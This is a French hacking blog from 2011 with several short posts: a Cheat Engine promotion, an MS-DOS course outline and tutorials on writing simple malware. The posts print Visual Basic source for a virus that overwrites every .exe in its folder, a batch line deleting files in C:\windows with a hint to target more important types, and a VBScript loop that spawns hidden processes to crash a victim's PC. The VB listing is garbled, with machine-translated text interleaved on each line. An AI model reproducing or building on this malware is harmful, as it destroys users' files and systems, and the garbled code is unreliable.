Overblog Suivre ce blog
Administration Créer mon blog
5 avril 2011 2 05 /04 /avril /2011 16:00

images.jpgQui n a jamais rêver de hacker des jeux flash pour uper un score mirobolant pour impressionner ces amis, ou pour encore profiter du jeu au maximum.

 

Dans ce nouveau dossier nous allons apprendre à utiliser un petit programme (petit mais puissant) j'ai nommé Cheat Engine (Outil de triche).

 

Que permet de faire Cheat Engine ?

 

Il vous permettra de modifier le contenue d'une variable stocker sur votre ordinateur, modifier le score par exemple !

Accélérer ou ralentir votre jeu etc...

 

Télécharger Cheat Engine 5.6.1

 

SOMMAIRE

 

--------------------------------------------------------------

I- Bien démarrer

II- Etape 1/5

III- Etape 2/5

IV- Etape 3/5

V - Etape 4/5

VI - Etape 5/5

---------------------------------------------------------------

Repost 0
Published by Gur@nco - dans Dossiers
commenter cet article
27 mars 2011 7 27 /03 /mars /2011 13:19

imagesLes virus informatiques sont sous de nombreuses formes avec de nombreuses fonctions différentes. Certains sont plutôt simplistes et peuvent être détectés par l'utilisateur moyen tandis que d'autres sont complexes et passent inaperçus pendant un certain temps. Les virus les plus courants relevant de la classification des infecteurs de fichiers, qui fonctionnent en infectant des fichiers exécutables. Ils y parviennent en insérant leur code malveillant dans une zone du fichier d'origine, lui permettant d'être exécutée chaque fois que le fichier est accessible Certains d'entre eux sont capables de complètement écraser un fichier, ce qui rend tout un programme inutile.

 

C’est le cas de ce type de virus que nous allons voir aujourd’hui. Les virus Overwritters.

Je sais que les virus overwritters , n'ont malheureusement plus aucune chance de se propager et ils ne sont pas "intelligent". Malgré tout cela overwritters peut vous aider à comprendre les bases du VRAI virus. Je vais vous donner le code d'abord et ensuite on va le passer en revue.

 -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-= 

 

 Option Explicit Option Explicit

 Dim myarray() As Byte myarray Dim () As Byte

 Dim victim As String victime Dim As String

 Const mysize As Integer = 11776 mysize Const As Integer = 11776

 

 Private Sub Form_Load() Private Sub Form_Load ()

 On Error Resume Next On Error Resume Next

 Dim Free Dim gratuit

 Free = FreeFile Free = FreeFile

 

 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free

 ReDim myarray(mysize) ReDim MonTableau (mysize)

 Get #1, 1, myarray Obtenez myarray # 1, 1,

 Close #Free Close # Free

 

 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")

 While victim <> "" Bien que victime <> ""

 

 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free

 Put #1, , myarray Put # 1,, myarray

 Put #1, , mysize Put # 1,, mysize

 Close #Free Close # Free

 

 victim = Dir() victime = Dir ()

 

 Wend Wend

 

 End End

 End Sub End Sub

  -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-= 

 

Décodons tout cela : (miam ! J)

 Option Explicit Option Explicit

 Dim myarray() As Byte myarray Dim () As Byte

 Dim victim As String victime Dim As String

 Const mysize As Integer = 11776 mysize Const As Integer = 11776

Ici, nous définissons les variables que nous allons utiliser, le "myarray ()" variable qui contient le code binaire du virus, "victime" est la variable qui contient le nom du fichier de la victime et le "mysize" variable contient la taille du virus.

 Private Sub Form_Load() Private Sub Form_Load ()

 On Error Resume Next On Error Resume Next

Nous ouvrons le sous dossier que nous allons utiliser (Form_Load), et nous avons mis notre erreur poignée c'est-à-dire qu’en cas d’erreur le programme s’arrêtera là.

 Dim Free Dim gratuit

 Free = FreeFile Free = FreeFile

C'est une bonne idée de prendre exemple sur le virus y2k. Cela vous débarrasse de la lecture / écriture des erreurs, car il est open source.

 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free

 ReDim myarray(mysize) ReDim MonTableau (mysize)

 Get #1, 1, myarray Obtenez myarray # 1, 1,

 Close #Free Close # Free

Maintenant, nous allons sortir le code binaire de nos virus et nous allons le stocker dans la variable "myarray".

 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")

 While victim <> "" Bien que victime <> ""

 

 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free

 Put #1, , myarray Put # 1,, myarray

 Put #1, , mysize Put # 1,, mysize

 Close #Free Close # Free

Ici, nous définissons la variable « victime » et nous avons mis notre code binaire dans le programme de la victime.

 victim = Dir() victime = Dir ()

 

 Wend Wend

Puis nous avons mis la victime à zéro, et nous répétons l'ensemble du processus d'infecter tous les fichiers. Exe dans le répertoire courant.

 End End

 End Sub End Sub

Et enfin, nous fermons le programme et les sous dossiers.

Repost 0
Published by Gur@nco - dans Dossiers
commenter cet article
20 mars 2011 7 20 /03 /mars /2011 13:31

ms-dos.jpg

Ce nouveau dossier est là pour vous apprendre à vous servir du MS-DOS.

Cet ancien système d'exploitation permet bien des choses:

créer une liste des fichiers d'un répertoire et de ses sous-répertoires, créer des sortes de mini-application appelées fichiers batch...

 

A quoi ça va nous servir ?

Un bon hacker qui je vous le rappelle est sensé être un bon programmeur et bon informaticien, il se doit de savoir utiliser la plus simple des tables de commandes.

Pour être encore plus précis, en apprenant le MS-DOS vous allez vous familiariser avec la console de Windows et de se fait vous ne serait plus surpris quand on utilisera cette dernière pour un accès à distance d’un pc grâce au protocole FTP ou encore Telnet dont nous allons parler. 

 

 

 

SOMMAIRE :

I MS-DOS Kezako !?

II Premiers Pas

III Les commandes 1/2

IV Les commandes 2/2

V Les fichiers batch

VI Quelques astuces

VII Annexes

 

Voilà le cour et maintenant termier, j'attend vos commentaires et votre avis et je vous dit à la prochaine pour un autre cour ...

 

Repost 0
Published by Gur@nco - dans Dossiers
commenter cet article
19 mars 2011 6 19 /03 /mars /2011 17:48

images.jpg

Bonjour à tous.

Aujourd’hui j’ai choisi de parler à propos des virus, on entend beaucoup parler, on a tous été infecter un jour ou l’autre par ces programmes. Parce que avant tous un virus est un programme.

Nous allons donc voir comment ça fonctionne mais aussi comment en créer ; bien sur !

Dans cette première partie, nous allons commencer avec des virus plutôt simple vous allez le voir :

Les Virus VB (Visual Basic):

Ce type de virus sont les plus anciens et ont été parmi les premiers à être apparus.

 

 

Créer un petit virus pas très méchant...

Avant toute chose je tiens a vous avertir que cette article n'est là que dans un but pédagogique, et vous n'étes nullement incités à reprtoduire ceci sur votre pc. Vous etes donc résponsable de vos actes et ni moi ni mon hébérgeur ne seons tenu pour responsable.

Nous allons apprendre à créer un petit virus en *bat. :

C’est partit :

Pour commencer, ouvrez votre editeur de texte prèfèré (ex : bloc-note). Ensuite, tapes sans sauter de ligne :


del C :windows*.bmp cls



Après, enrigistrer le code avec l’extension *.bat

Attention
: N’ouvrez en aucun cas le fichier sur votre ordinateur, le virus s’exécutera !


 Comment ça marche, explications:

del C:windows*.bmp

del : sert à supprimer
C:windows : situe le dossier où la commande doit avoir lieu
* : suivit d'une extension désigne tous les dossiers portant cette extension dans l'exemple l'extension est *.bmp .Donc ce mini virus supprimera tous les fichiers portant l'extension *.bmp (en locurrence des images) se trouvant dans windows.

 

Ce virus pourrait être plus dangereux si vous changiez l’extension en une autre plus importante, mais la, je laisse libre choix à votre imagination !^^

 


Créer un virus plus méchant…
 


vous rêvez de savoir planter des pc très facilement ?^^

C’est partit :

Commencez, par ouvrir votre editeur de text.
Ensuite, tapes le code suivant :


Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop



Après, enregistrez le avec le nom que vous voulez, avec l’extension .vbs


Petite précision :

Ici, le bloc-note (celui de windows) représente l'application désirée, vous pouvez la remplacer par une application plus lourde (pour des résultats plus rapides et meilleurs).
false : signifie que les fenêtres ne doivent pas être initialisées, seulement les processus pour que la victime ne se rende pas compte.
Loop : signifie que ça doit se faire en boucle : ça doit lancer le bloc-note, recommencé et ainsi de suite.

 

Ces virus ont été créé en Visual Basic, si vous voulez aller plus loin dans la création de virus apprenez le Visual Basic (qui est un langage de programmation plutôt simple)

Dans la deuxième partie du cours nous verrons des échantillons de vrais virus bien méchant !

Si vous voulez un bon tuto : "Apprendre le Visual basic simplement" laissez des coms.

Repost 0
Published by Gur@nco - dans Dossiers
commenter cet article
14 mars 2011 1 14 /03 /mars /2011 12:08

Mon blog contient des cours de hacking, méthode illégale de modification de programmes (pour des logiciels commerciaux ou non libres de droits), mais le hacking reste tout à fait licite dans le sens de l'étude des protections de crackmes par exemple. Ces documents sont à votre disposition dans un but exclusivement pédagogique et vous n'êtes en aucun cas incité à les mettre en application sur des programmes commerciaux ou non libres de droits. Vous et vous seul êtes responsable de vos actes, ni moi ni mon hébergeur ne pourront être impliqués.

Repost 0
Published by Gur@nco - dans Dossiers
commenter cet article
25 août 2010 3 25 /08 /août /2010 20:10

02295848.jpgBonjour à tous,

 

Avant tout je tiens à vous rappeler que mon blog contient des cours de hacking, méthode illégale de modification de de site internet ou de programmes (pour des logiciels commerciaux ou non libres de droits).

 

Mais le hacking  reste tout à fait licite dans le sens de l'étude des protections de de programmes par exemple.

 

Ces documents sont à votre disposition dans un but exclusivement pédagogique et vous n'êtes en aucun cas incité à les mettre en application.

 

Vous et vous seul êtes responsable de vos actes, ni moi ni mon hébergeur (over-blog) ne pourront être impliqués.

 

Vous trouverez si-desous la liste complète sur tout mes cours qui traitent de ce sujet qui est : comment devenir un Hacker.

 

-------------------------------------------------------------------------------------------------------------

SOMMAIRE

I   - Start Smart 

II  - Le craking.

    a - Le langage Assembleur. 

    b - Avant de commencer.

    c - L'hexadécimal et les types de sauts.

    dMon premier Crack-me.

    eCracke ce crack-me new

    f -  Trouver le serial new

   g -  A mort le crack me ! new


-------------------------------------------------------------------------------------------------------------


Repost 0
Published by hack.over-blog.com - dans Dossiers
commenter cet article

Présentation

  • : Le hacking à la portée de tout le monde
  • Le hacking à la portée de tout le monde
  • : le hacking n'aura plus de secrets pour vous !!
  • Contact

VIPEuroShare

Recherche

Archives

Pages

Liens